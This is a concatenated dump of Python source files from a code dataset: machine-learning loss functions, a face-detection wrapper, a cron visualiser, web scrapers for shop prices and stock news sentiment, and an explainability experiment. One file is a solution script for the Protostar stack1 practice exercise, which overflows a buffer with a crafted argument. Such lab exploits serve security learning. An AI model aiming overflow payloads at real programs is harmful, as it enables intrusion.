value\n","sub_path":"p2_continuous-control/actor_critic.py","file_name":"actor_critic.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"79741013","text":"import tensorflow as tf\nimport numpy as np\n\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.framework import ops\n\ndef sparse_cost_sensitive_loss (logits, labels, cost_matrix):\n batch_cost_matrix = tf.nn.embedding_lookup(cost_matrix, labels)\n eps = 1e-6\n probability = tf.clip_by_value(tf.nn.softmax(logits), eps, 1-eps)\n cost_values = tf.log(1-probability)*batch_cost_matrix\n loss = tf.reduce_mean(-tf.reduce_sum(cost_values, axis=1))\n return loss\n\n\ndef onehot(data,label_dict={'boat':1,'nature':0}):\n a = np.array([label_dict[k] for k in data])\n b = np.zeros((len(a),a.max()+1))\n b[np.arange(len(data)),a] = 1\n return b.astype(np.int32)\n\n\ndef weighted_ce(targets, logits, beta, name=None):\n \"\"\"Computes a weighted cross entropy like in \n http://www.vision.ee.ethz.ch/~cvlsegmentation/driu/data/paper/DRIU_MICCAI2016.pdf\n cross entropy is computed as follows:\n z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))\n = z * -log(1 / (1 + exp(-x))) + (1 - z) * -log(exp(-x) / (1 + exp(-x)))\n = z * log(1 + exp(-x)) + (1 - z) * (-log(exp(-x)) + log(1 + exp(-x)))\n = z * log(1 + exp(-x)) + (1 - z) * (x + log(1 + exp(-x))\n = (1 - z) * x + log(1 + exp(-x))\n = x - x * z + log(1 + exp(-x))\n \"\"\"\n with ops.name_scope(name, \"logistic_loss\", [logits, targets]) as name:\n logits = ops.convert_to_tensor(logits, name=\"logits\")\n targets = ops.convert_to_tensor(targets, name=\"targets\")\n targets = tf.cast(targets,tf.float32)\n try:\n targets.get_shape().merge_with(logits.get_shape())\n except ValueError:\n raise ValueError(\n \"logits and targets must have the same shape (%s vs %s)\" %\n (logits.get_shape(), targets.get_shape()))\n targets = tf.math.add(targets,tf.keras.backend.epsilon())\n zeros = array_ops.zeros_like(logits, dtype=logits.dtype)\n cond = (logits >= zeros)\n relu_logits = array_ops.where(cond, logits, zeros)\n neg_abs_logits = array_ops.where(cond, -logits, logits)\n return tf.reduce_mean(tf.math.abs((math_ops.add(\n beta * (relu_logits - logits * targets), # false negatives\n (1-beta)*(math_ops.log1p(math_ops.exp(neg_abs_logits))), # false positives\n name=name))))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"604316496","text":"import cv2\nimport torch\nimport numpy as np\nfrom pathlib import Path\nfrom typing import Sequence, Iterator, List\n\nfrom app.nn_inference.common.base_wrapper import BaseWrapper\nfrom app.base_types import Image\nfrom app.result_types import FaceResult\nfrom app.nn_inference.faces.BlazeFace_PyTorch.blazeface import BlazeFace\nfrom app.nn_inference.common.utils import chunks\n\n\nclass BlazeFaceWrapper(BaseWrapper):\n \"\"\"\n BlazeFace model\n Original implementation at https://github.com/hollance/BlazeFace-PyTorch\n \"\"\"\n\n def __init__(self, batch_size: int = 2) -> None:\n current_dir = Path(__file__).parent\n base_path = current_dir.parent / \"BlazeFace_PyTorch\"\n self.anchors_path = base_path / \"anchors.npy\"\n self.weights_path = base_path / \"blazeface.pth\"\n\n self.device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n self.model = BlazeFace()\n\n self.model.min_score_thresh = 0.75\n self.model.min_suppression_threshold = 0.3\n\n self.batch_size = batch_size\n\n def __repr__(self):\n return f\"BlazeFace model on {self.device}\"\n\n def load(self) -> bool:\n try:\n self.model.to(self.device)\n self.model.load_anchors(str(self.anchors_path))\n self.model.load_weights(str(self.weights_path))\n return True\n except Exception as e:\n print(\"Loading weight and anchors failed\", e)\n return False\n\n def unload(self) -> None:\n self.model.to(\"cpu\")\n\n def preprocess(self, images: Sequence[Image]) -> Iterator[Image]:\n return (cv2.cvtColor(image, cv2.COLOR_BGR2RGB) for image in images)\n\n def predict(self, images: Sequence[Image]) -> List[FaceResult]:\n ready_images = np.asarray(tuple(self.preprocess(images)))\n if len(ready_images) == 1:\n predictions = self.model.predict_on_image(ready_images[0]).cpu().numpy()\n if predictions.shape[0] > 0:\n return [FaceResult(predictions[16],\n tuple(predictions[:, 4], ),\n predictions[4:16].tolist()), ]\n else:\n return [FaceResult()]\n else:\n predictions = list()\n batches = chunks(ready_images, self.batch_size)\n for batch in batches:\n predictions.extend(self.model.predict_on_batch(batch))\n return list(map(lambda pred: FaceResult(pred[:, 16].tolist(),\n pred[:, 0:4].tolist(),\n pred[:, 4:16].tolist())\n if pred.shape[0] > 0\n else FaceResult(), predictions))\n","sub_path":"app/nn_inference/faces/wrappers/blaze_face_wrapper.py","file_name":"blaze_face_wrapper.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"454127660","text":"#!/usr/bin/python\n\nfrom subprocess import Popen\nfrom subprocess import PIPE\nimport os # os.path.join(), os.getcwd()\n\nBINARY_NAME = \"stack1\"\n\n\ndef main():\n # LOCAL VARIABLES\n currEnv = os.environ.copy()\n absBinFilename = os.path.join(os.getcwd(), BINARY_NAME)\n payload = (\"HarkRulz\" * 8) + \"dcba\"\n commandList = []\n\n # VERIFY FILE \n if not os.path.isfile(absBinFilename):\n raise IOError(\"{} not found\".format(absBinFilename))\n\n # RUN IT\n commandList.append(absBinFilename)\n commandList.append(payload)\n binary = Popen(commandList, env = currEnv, stdin = PIPE)\n if binary is not None:\n binary.communicate()\n\n # DONE\n return\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except Exception as err:\n print(repr(err))\n","sub_path":"more_linux/protostar-bin/stack1-solution.py","file_name":"stack1-solution.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"391239677","text":"# Copyright 2016 CloudComputingHUST\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\nimport configparser\nimport os.path\n\n_FILE_CONFIG_ = '/etc/keese/keese.conf'\n\nclass Conf(object):\n\tdebug = False\n\tconnection = None\n\n\tdef __init__(self):\n\t\t\t#debug here\n\t\tif (os.path.isfile(_FILE_CONFIG_) == False):\n\t\t\tprint(_FILE_CONFIG_ + \" not found!\");\n\n\t\tcfg = configparser.ConfigParser()\n\t\tcfg.read(_FILE_CONFIG_)\n\t\tself.debug = cfg.getboolean('default', 'debug')\n\t\tself.connection = cfg.get('database', 'connection')\n","sub_path":"keese/common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"451921626","text":"from django.shortcuts import render\nfrom django.conf import settings\nfrom crontab import CronTab\nfrom datetime import datetime, timedelta\nimport time\nimport itertools\nimport os\nfrom collections import defaultdict \n\n\n# Create your views here.\n\n# def index(request):\n# items = [\n# {'id' : 1, 'content' : 'item 1', 'start' : '2014-04-20'},\n# {'id' : 2, 'content' : 'item 2', 'start' : '2014-04-17'},\n# {'id' : 3, 'content' : 'item 3', 'start' : '2014-04-17'},\n# {'id' : 4, 'content' : 'item 4', 'start' : '2014-04-17'},\n# {'id' : 5, 'content' : 'item 5', 'start' : '2014-04-17'},\n# {'id' : 6, 'content' : 'item 6', 'start' : '2014-04-18'}, \n# {'id' : 7, 'content' : 'item 7', 'start' : '2014-04-16', 'end' : '2014-04-19'}\n# ]\n \n# context = {'items': items}\n# return render(request, 'cronvis/index.html', context)\ndef today(request):\n return 404\n\n\ndef index(request, start=None, end=None, mode='Timeline'):\n # cronlines = [\n # '30 5 * * *\t/srv/ReTransDjango/bin/manage LindtUnscheduledFile >> /srv/ReTransDjango/var/log/scripts/LindtUnscheduledFile.log 2>&1\\n',\n # '45 13 * * *\t/srv/ReTransDjango/bin/manage LindtUnscheduledFile >> /srv/ReTransDjango/var/log/scripts/LindtUnscheduledFile.log 2>&1\\n',\n # '30 19 * * *\t/srv/ReTransDjango/bin/manage ReturnLindtCSVFile >> /srv/ReTransDjango/var/log/scripts/ReturnLindtCSVFile.log 2>&1\\n',\n # '45 4,11,15 * * *\t/srv/ReTransDjango/bin/manage ReturnLindtCSVFile >> /srv/ReTransDjango/var/log/scripts/ReturnLindtCSVFile.log 2>&1\\n',\n # ]\n print(request, start, end, mode) \n cronfile = open(os.path.join(settings.BASE_DIR, 'crontab.txt'))\n cronlines = [l for l in cronfile.readlines() if not l.startswith('#') and l != '\\n']\n #cronlines = cronlines[:50]\n cronfile.close()\n print('Making events for %s cronlines' % len(cronlines))\n \n now = datetime.now()\n\n if not start:\n start = now.replace(hour=0, minute=0, second=0)\n if not end:\n end = now.replace(hour=23, minute=58, second=59) \n template = 'cronvis/index.html'\n context = {}\n\n if mode == 'Timeline':\n items, options = getTimelineData(cronlines, start, end)\n elif mode == 'Histogram':\n items, options = getHistogramData(cronlines, start, end)\n elif mode == 'Frequency':\n items, options = getFrequencyData(cronlines, start, end)\n\n\n context['items'] = items\n context['options'] = options\n\n context['mode'] = mode\n\n return render(request, template, context)\n\n\ndef getFrequencyData(cronlines, start, end):\n eventId = itertools.count(1)\n items = []\n groups = {}\n groupId = itertools.count(1)\n items = []\n height = defaultdict(int) \n seen_times = [] # some optimization\n for i, line in enumerate(cronlines):\n events = getWeekEvents(line)\n for event in events:\n height[event.strftime('%Y-%m-%dT%H:%M:%S')]+=1\n time_map = defaultdict(list) \n for i, line in enumerate(cronlines):\n try:\n events = getWeekEvents(line)\n jobName = line.split()[6]\n if jobName not in groups.keys():\n croncode = ' '.join(line.split()[:5])\n \n \n for event in events:\n time_map[event.isoformat()].append(jobName)\n if event.strftime('%Y-%m-%dT%H:%M:%S') not in seen_times:\n items.append(\n {'id' : eventId.next(), 'y': height[event.strftime('%Y-%m-%dT%H:%M:%S')], 'content' : jobName, 'x' : event.strftime('%Y-%m-%dT%H:%M:%S'),}\n )\n seen_times.append(event.strftime('%Y-%m-%dT%H:%M:%S'))\n print('Processed %s of %s lines' % (i+1, len(cronlines)))\n except ValueError as e:\n print(\"Value Error: \", e)\n\n options = {\n 'start' : (datetime.now() - timedelta(hours=1)).isoformat(),\n 'end': (datetime.now() + timedelta(hours=2)).isoformat(),\n 'min' : start.isoformat(),\n 'max' : end.isoformat(),\n 'timeAxis' : { \n 'scale' : 'minute',\n 'step' : 5\n },\n 'zoomMax' : 129600000, #36 hours in ms\n 'zoomMin' : 6000000,\n }\n options['timeMap'] = dict(time_map)\n \n return (items, options)\n\n\n\ndef getHistogramData(cronlines, start, end):\n\n cronlines = cronlines[:50]\n\n eventId = itertools.count(1)\n items = []\n groups = {}\n groupId = itertools.count(1)\n items = []\n for i, line in enumerate(cronlines):\n try:\n events = getWeekEvents(line)\n jobName = line.split()[6]\n if jobName not in groups.keys():\n croncode = ' '.join(line.split()[:5])\n groups[jobName] = {'id': groupId.next(), 'cronline': croncode}\n \n for event in events:\n items.append(\n {'id' : eventId.next(), 'y': 1, 'content' : jobName, 'x' : event.strftime('%Y-%m-%dT%H:%M:%S'), 'group':groups[jobName]['id']}\n )\n print('Processed %s of %s lines' % (i+1, len(cronlines)))\n except ValueError as e:\n print(\"Value Error: \", e)\n\n options = {\n 'start' : (datetime.now() - timedelta(hours=1)).isoformat(),\n 'end': (datetime.now() + timedelta(hours=2)).isoformat(),\n 'min' : start.isoformat(),\n 'max' : end.isoformat(),\n 'timeAxis' : { \n 'scale' : 'minute',\n 'step' : 5\n },\n 'zoomMax' : 129600000, #36 hours in ms\n 'zoomMin' : 6000000,\n 'style': 'bar',\n 'barChart': {'align' : 'right'},\n #'height': '750px',\n }\n\n formatted_groups = []\n for group in groups:\n element = {}\n element['id'] = groups[group]['id']\n element['content'] = group\n element['cronline'] = groups[group]['cronline']\n formatted_groups.append(element)\n options['_groups'] = formatted_groups\n \n return (items, options)\n\n\n\n\ndef getTimelineData(cronlines, start, end):\n eventId = itertools.count(1)\n items = []\n\n for i, line in enumerate(cronlines):\n try:\n events = getWeekEvents(line)\n jobName = line.split()[6]\n for event in events:\n items.append(\n {'id' : eventId.next(), 'content' : jobName, 'start' : event.strftime('%Y-%m-%dT%H:%M:%S')}\n )\n print('Processed %s of %s lines' % (i+1, len(cronlines)))\n except ValueError as e:\n print(\"Value Error: \", e)\n\n options = {\n 'start' : datetime.now().isoformat(),\n 'end': (datetime.now() + timedelta(hours=2)).strftime('%b %d %Y'),\n 'min' : start.strftime('%b %d %Y'),\n 'max' : end.strftime('%b %d %Y'),\n 'timeAxis' : { \n 'scale' : 'minute',\n 'step' : 15 \n },\n 'zoomMax' : 604800000,\n 'zoomMin' : 6000000\n }\n \n return (items, options)\n\ndef getWeekEvents(cronEntry):\n \"\"\" Return a list of datetimes representing every scheduled instance of a \n cron job described by cronEntry \"\"\"\n croncode = ' '.join(cronEntry.split()[:5])\n c = CronTab(croncode)\n now = datetime.now().replace(hour=0, minute=0, second=0)\n weekStart = now - timedelta(days=now.weekday())\n weekEnd = weekStart + timedelta(days=6)\n now = weekStart\n events = []\n\n while now <= weekEnd:\n secToNext = c.next(now=now, default_utc=False)\n nextEvent = roundTime(now + timedelta(seconds=secToNext))\n events.append(nextEvent)\n now = nextEvent\n\n return events\n\n\ndef roundTime(dt=None, roundTo=60):\n \"\"\"Round a datetime object to any time laps in seconds\n dt : datetime.datetime object, default now.\n roundTo : Closest number of seconds to round to, default 1 minute.\n Author: Thierry Husson 2012 - Use it as you want but don't blame me.\"\"\"\n\n if dt == None : dt = datetime.now()\n seconds = (dt.replace(tzinfo=None) - dt.min).seconds\n rounding = (seconds+roundTo/2) // roundTo * roundTo\n return dt + timedelta(0,rounding-seconds,-dt.microsecond)\n","sub_path":"cronjobs/cronjobs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"177047181","text":"__author__ = 'Matthew'\n\nimport logging, sys\n\n\nclass LoggingFormatter(logging.Formatter):\n err_fmt = \"%(levelname)s: [%(name)s] %(msg)s\"\n dbg_fmt = \"[%(name)s] %(msg)s\"\n\n def __init__(self, fmt=\"%(levelno)s: %(msg)s\"):\n logging.Formatter.__init__(self, fmt)\n\n def format(self, record):\n\n format_orig = self._fmt\n\n if record.levelno == logging.INFO:\n self._fmt = LoggingFormatter.dbg_fmt\n\n else:\n self._fmt = LoggingFormatter.err_fmt\n\n result = logging.Formatter.format(self, record)\n\n self._fmt = format_orig\n\n return result\n\n\ndef attach():\n fmt = LoggingFormatter()\n hdlr = logging.StreamHandler(sys.stdout)\n hdlr.setFormatter(fmt)\n\n logging.root.addHandler(hdlr)\n","sub_path":"util/logman.py","file_name":"logman.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"635110883","text":"import csv\r\nimport urllib.request\r\nfrom bs4 import BeautifulSoup\r\n\r\nBASE_URL = 'https://www.citrus.ua/noutbuki-i-ultrabuki/'\r\n\r\ndef get_html(url):\r\n response = urllib.request.urlopen(url)\r\n return response.read()\r\n\r\ndef get_page_count(html):\r\n soup = BeautifulSoup(html, features='lxml')\r\n pagination = soup.find('div', class_='pagination-container')\r\n return int(pagination.find_all('a')[-2].text)\r\n\r\ndef parse(html):\r\n soup = BeautifulSoup(html, features='lxml')\r\n\r\n table = soup.find('div', class_='catalog__items')\r\n\r\n projects= []\r\n\r\n for row in table.find_all(class_='product-card__overview'):\r\n\r\n title = row.find_all('div', class_='product-card__name')\r\n price = row.find_all('div', class_='prices__price')\r\n projects.append({\r\n\r\n # 'title': title[0].a.text.strip(),\r\n 'title': title[0].a['title'],\r\n 'price': price[0].span.text.strip(),\r\n\r\n })\r\n\r\n\r\n return projects\r\n\r\n\r\n\r\ndef save(projects, path):\r\n with open(path, 'w') as csvfile:\r\n writer = csv.writer(csvfile)\r\n writer.writerow(('Название', 'Цена'))\r\n\r\n for project in projects:\r\n writer.writerow((project['title'], (project['price'])))\r\n\r\n\r\ndef main():\r\n\r\n page_count = get_page_count(get_html(BASE_URL))\r\n print('Всего страниц:', page_count)\r\n\r\n projects = []\r\n\r\n for page in range(1, page_count):\r\n print('Парсинг %d%%' % (page / page_count * 100))\r\n projects.extend(parse(get_html(BASE_URL + '?page_%d' % page)))\r\n print(\"Парсинг 100%\")\r\n\r\n for project in projects:\r\n print(project)\r\n\r\n save(projects, 'projects.cvs')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"160309861","text":"class StreamChecker:\n\n def __init__(self, words: List[str]):\n self.words = {}\n self.wordslen = []\n for w in words:\n le = len(w)\n if le not in self.wordslen:\n self.wordslen.append(le)\n self.words[le] = []\n self.words[le].append(w[::-1])\n self.letter = ''\n\n def query(self, letter: str) -> bool:\n self.letter = letter + self.letter\n letter = self.letter\n le = len(letter)\n for wordlen in self.wordslen:\n if wordlen <= le:\n if letter[:wordlen] in self.words[wordlen]:\n return True\n return False\n \n\n# Your StreamChecker object will be instantiated and called as such:\n# obj = StreamChecker(words)\n# param_1 = obj.query(letter)\n","sub_path":"leetcode/wc133/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"537996536","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n#\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport argparse\nimport os\nimport sys\nimport json\nimport time\nfrom collections import defaultdict\n\nimport numpy as np\nimport torch\nimport matplotlib\nmatplotlib.use('agg')\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom openapi.exp.abs_exp import AbsExp\nfrom openapi.utils import set_random_seed, PathManager, Plot\nfrom openapi.log import getLogger\nfrom openapi import config\n\n######################################################################\n# LMT related module must be imported to make the pickle load successfully\nfrom openapi.mdl.lmt import LinearModelTree, Node, LocalLasso\n\n######################################################################\n\nset_random_seed()\n\nlogger = getLogger(__name__)\n\n\ndef flip_pixels(grad, x_tensor, target_model, var_num, clss, f_limit=200):\n origin_prob = target_model.forward(x_tensor)\n origin_prob = origin_prob[0, clss]\n # Feature Index, Feature Gradient, Gradient Sign\n f_rank = sorted([(i, abs(grad[0, i]), grad[0, i] > 0) for i in range(var_num)],\n key=lambda i: i[1], reverse=True)[:f_limit]\n hacked = x_tensor.clone()\n hacked_imgs = []\n for idx, _, sign in f_rank:\n if sign > 0:\n hacked[0, idx] = 0\n else:\n hacked[0, idx] = 1\n hacked_imgs.append(hacked)\n hacked = hacked.clone()\n\n hacked_imgs = torch.cat(hacked_imgs, dim=0)\n predicts = target_model.forward(hacked_imgs)\n print(\"predicts size\", predicts.size())\n cpps = abs(origin_prob - predicts[:, clss])\n nlci = (torch.argmax(predicts, dim=1) != clss)\n return cpps.detach().cpu(), nlci.detach().cpu()\n\n\nclass Exp4(AbsExp):\n def __init__(self, model_name, dataset, expln_name, datasize):\n AbsExp.__init__(self, model_name, dataset, \"4\", expln_name, datasize)\n\n @staticmethod\n def plot(model_name, dataset, datasize):\n exp = \"4\"\n path_manager = PathManager(model_name, dataset)\n cpp = defaultdict(list)\n nlci = defaultdict(list)\n var_num = 0\n for expl_name in AbsExp.get_method_names():\n result_file = path_manager.result_json_path(exp, expl_name, datasize)\n if os.path.isfile(result_file):\n with open(result_file) as f:\n results = json.loads(f.readlines()[0])\n for value in results.values():\n var_num = len(value[\"CPP\"])\n cpp[expl_name].append(value[\"CPP\"])\n nlci[expl_name].append(value[\"NLCI\"])\n\n pdf_name = path_manager.figure_path(datasize, exp)\n pp = PdfPages(pdf_name)\n values = []\n names = []\n # Filter condition\n merger = {\n AbsExp.GroundTrueh: \"GT,OA,Z/N($10^{-4}$), Z/N($10^{-8}$)\",\n \"{}:0.0001\".format(AbsExp.LIMELinearRegression): \"L($10^{-4}$), L($10^-8$)\"\n }\n for name, instances in sorted(cpp.items(), key=Plot.sort_key, reverse=True):\n value = [0] * (var_num + 1)\n for instance in instances:\n for idx, v in enumerate(instance):\n value[idx + 1] += v\n values.append([i / len(instances) for i in value])\n names.append(name)\n Plot.plot_line(values, names, pp, model_name, \"CPP\", \"\\#Hacked Features\", [0, 1.01], 0.5)\n\n values = []\n names = []\n for name, instances in sorted(nlci.items(), key=Plot.sort_key, reverse=True):\n value = [0] * (var_num + 1)\n for instance in instances:\n for idx, v in enumerate(instance):\n value[idx + 1] += v\n values.append(value)\n names.append(name)\n logger.info(\"Number of instance {}\".format(len(instances)))\n Plot.plot_line(values, names, pp, model_name, \"NLCI\", \"\\#Hacked Features\", [0, len(instances)], 500)\n pp.close()\n\n def run(self):\n W_EST_NPZ = self.path_manager.w_est_file(self.expln_name, self.data_size)\n est_grads = np.load(W_EST_NPZ)[\"w\"].item()\n result = {}\n for i in range(self.images.size()[0]):\n start_ts = time.time()\n x_tensor = self.images[i].view(-1, self.var_num)\n clss = self.labels[i].item()\n pred_clss = torch.argmax(self.mdl.forward(x_tensor), dim=1).item()\n if clss == pred_clss:\n f_grad = est_grads[i]\n\n cpps, nlci = flip_pixels(f_grad, x_tensor, self.mdl, self.var_num, clss)\n\n result[i] = {\n \"CPP\": cpps.numpy().tolist(),\n \"NLCI\": nlci.numpy().tolist()\n }\n print(result[i])\n rst_str = json.dumps(result)\n with open(self.result_json, \"w\") as w:\n w.write(\"{}\\n\".format(rst_str))\n\n end_ts = time.time()\n logger.info(\"Time Elapse: {}\".format(end_ts - start_ts))\n logger.info(\"=\" * 40)\n logger.info(\"Finish Dataset: {} Datasize: {} Explainer: {} Model: {} Experiment: {}\".format(\n self.dataset, self.data_size, self.expln_name, self.model_name, self.exp))\n\n\ndef testcases():\n def test_1():\n logger.info(\"Using Device: {}\".format(config.DEVICE))\n model_name = \"MLP\"\n dataset = \"FMNIST\"\n expln_name = AbsExp.OpenAPI\n datasize = 10\n exp = Exp4(model_name, dataset, expln_name, datasize)\n exp.run()\n logger.info(\"Finish\")\n\n def test_plot():\n logger.info(\"Using Device: {}\".format(config.DEVICE))\n model_name = \"MLP\"\n dataset = \"FMNIST\"\n expln_name = AbsExp.OpenAPI\n datasize = 10\n Exp4.plot(model_name, dataset, datasize)\n logger.info(\"Finish\")\n\n # test_1()\n test_plot()\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--mdl\", help=\"Model Name\", choices=[\"LMT\", \"MLP\"], required=True)\n parser.add_argument(\"--dataset\", help=\"data. E.g. FMNIST\", choices=[\"FMNIST\", \"MNIST\"], required=True)\n parser.add_argument(\"--datasize\", help=\"number of test images per class\", required=True)\n parser.add_argument(\"--explainer\", help=\"name of explainer\", choices=AbsExp.get_method_names())\n parser.add_argument(\"--gpu\", help=\"GPU used\", choices=[\"cuda:1\", \"cuda:0\", \"cuda:2\", \"cuda:3\"])\n parser.add_argument(\"--task\", help=\"GPU used\", choices=[\"plot\", \"compute\"], required=True)\n parsedArgs = parser.parse_args(sys.argv[1:])\n model_name = parsedArgs.mdl\n dataset = parsedArgs.dataset\n expln_name = parsedArgs.explainer\n datasize = int(parsedArgs.datasize)\n task = parsedArgs.task\n config.DEVICE = parsedArgs.gpu\n\n if task == \"compute\":\n exp = Exp4(model_name, dataset, expln_name, datasize)\n exp.run()\n else:\n Exp4.plot(model_name, dataset, datasize)\n logger.info(\"Finish\")\n\n\nif __name__ == '__main__':\n # testcases()\n main()\n\n","sub_path":"openapi/exp/gradient/exp_4.py","file_name":"exp_4.py","file_ext":"py","file_size_in_byte":7040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"572679873","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport pandas as pd\n\ndef get_gainers():\n url = 'https://finance.yahoo.com/gainers/?offset=0&count=100'\n page = requests.get(url=url,headers={'user-agent': 'my-app/0.0.1'})\n soup = BeautifulSoup(page.content, 'html.parser')\n\n rows = soup.findAll('td')\n \n tickers = []\n for row in rows:\n a = row.find('a')\n if a:\n tickers.append(a.text)\n \n return tickers\n\ndef get_sentiment_dict(ticker):\n url = f'https://finviz.com/quote.ashx?t={ticker}' #Must have 3.6 or up\n page = requests.get(url=url,headers={'user-agent': 'my-app/0.0.1'})\n soup = BeautifulSoup(page.content, 'html.parser')\n news_headlines = soup.findAll(\"a\", {'class':'tab-link-news'})\n #List of Headlines\n headlines = []\n for h in news_headlines:\n headlines.append(h.text)\n df = pd.DataFrame(headlines, columns=['Headlines'])\n # Instantiate the sentiment intensity analyzer\n vader = SentimentIntensityAnalyzer()\n # Iterate through the headlines and get the polarity scores using vader\n scores = df['Headlines'].apply(vader.polarity_scores).tolist()\n\n temp = {}\n comp = 0\n neu = 0\n pos = 0\n neg = 0\n for i in range(len(headlines)):\n temp[headlines[i]] = scores[i]\n comp += scores[i]['compound']\n pos += scores[i]['pos']\n neg += scores[i]['neg']\n neu += scores[i]['neu']\n \n averages = {'compound': round(comp/len(scores),3),\n 'pos': round(pos/len(scores),3),\n 'neg': round(neg/len(scores),3),\n 'neu': round(neu/len(scores),3)}\n \n return temp, averages\n \n\ndef get_current_price(ticker):\n \"\"\"\n type ticker: string, uppercase, length < 5\n rtype: float\n \"\"\"\n url = f'https://www.marketwatch.com/investing/stock/{ticker}' #Must have 3.6 or up\n page = requests.get(url=url)\n soup = BeautifulSoup(page.content, 'html.parser')\n price = soup.find('bg-quote', {'field':'Last'})\n if price:\n string = price.text\n index = string.find(',')\n if index > 0:\n string = string[:index] + string[index+1:]\n return float(string)\n return 0\n\ndef get_sentiment(ticker):\n \"\"\"\n Returns float of sentiment for given ticker, calculated by averaging sentiment\n of scraped news headlines\n -1 <= sentiment <= 1\n \"\"\"\n url = f'https://finviz.com/quote.ashx?t={ticker}' #Must have 3.6 or up\n page = requests.get(url=url,headers={'user-agent': 'my-app/0.0.1'})\n soup = BeautifulSoup(page.content, 'html.parser')\n news_headlines = soup.findAll(\"a\", {'class':'tab-link-news'})\n \n #List of Headlines\n headlines = []\n for h in news_headlines:\n headlines.append(h.text)\n \n df = pd.DataFrame(headlines, columns=['Headlines'])\n\n # Instantiate the sentiment intensity analyzer\n vader = SentimentIntensityAnalyzer()\n # Iterate through the headlines and get the polarity scores using vader\n scores = df['Headlines'].apply(vader.polarity_scores).tolist()\n \n total = 0\n for i in range(len(scores)):\n total = total + scores[i]['compound']\n if len(scores)>0:\n return round(total/len(scores), 3)\n else:\n return 0\n\ndef get_sector_sentiments():\n \"\"\"\n Returns a dataframe of sentiments by sector and ticker\n \"\"\"\n sectors = {'Consumer Cyclical' : ['AMZN', 'HD','NKE','MCD','SBUX','GM','F', 'LVS'],\n 'Communication Services' : ['GOOGL','FB','VZ','T','EA','DIS','NFLX', 'TMUS', 'CMCSA'],\n 'Consumer Defense' : ['WMT','PG','COST','EL','KMB','CL','TGT','KHC', 'PEP'],\n 'Technology' : ['MSFT','AAPL','INTC','CSCO','CRM','IBM'],\n 'Financial' : ['V','MA','JPM','GS','BLK'],\n 'Healthcare' : ['PFE','ABBV','AGN','JNJ','MRK','CVS','ABT'],\n 'Industrials' : ['GE','UPS','MMM','AMT','NEE','RTX','BA'],\n 'Energy' : ['XOM','CVX','COP','PSX','KMI']}\n sentiments = {}\n for sector in sectors:\n sector_sum = 0\n num_ticks = 0\n sector_sentiments = {}\n for t in sectors[sector]:\n t_s = get_sentiment(t)\n sector_sentiments[t] = t_s\n sector_sum += t_s\n num_ticks += 1\n sector_sentiments['Sentiment'] = round(sector_sum/num_ticks, 3)\n sentiments[sector] = sector_sentiments\n return sentiments\n\ndef get_SANDP_tickers():\n \"\"\"\n Function that will web scrape S and P 500 ticker symbols\n \"\"\"\n url='https://en.wikipedia.org/wiki/List_of_S%26P_500_companies'\n page = requests.get(url)\n page_content = page.content\n soup = BeautifulSoup(page_content,'html.parser')\n tickers = soup.findAll('a', {'class':'external text'})\n \n tickers_text = ['SPY']\n for ticker in tickers:\n text = ticker.text\n if len(text) < 5:\n tickers_text.append(text)\n \n return tickers_text\n\ndef get_low_float_stocks():\n urls = [\"https://www.highshortinterest.com/\", \"https://www.highshortinterest.com/all/2\"]\n stocks = []\n for url in urls:\n page = requests.get(url)\n page_content = page.content\n soup = BeautifulSoup(page_content,'html.parser')\n\n rows = soup.findAll(\"tr\")\n for i in range(6,len(rows)):\n tds = rows[i].findAll(\"td\")\n if len(tds) > 4:\n ticker = tds[0].find('a').text\n flt = tds[4].text\n flt = float(flt[:-1])\n if flt < 100.0: #in millions\n stocks.append(ticker)\n return stocks","sub_path":"modules/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":5627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"254284935","text":"#This program will calculate the average of a series of numbers\n#You'll be asked to enter a series of numbers of you choice\n#This program will be adding a rgue value of -1\n\n\nadded = -1\namount = 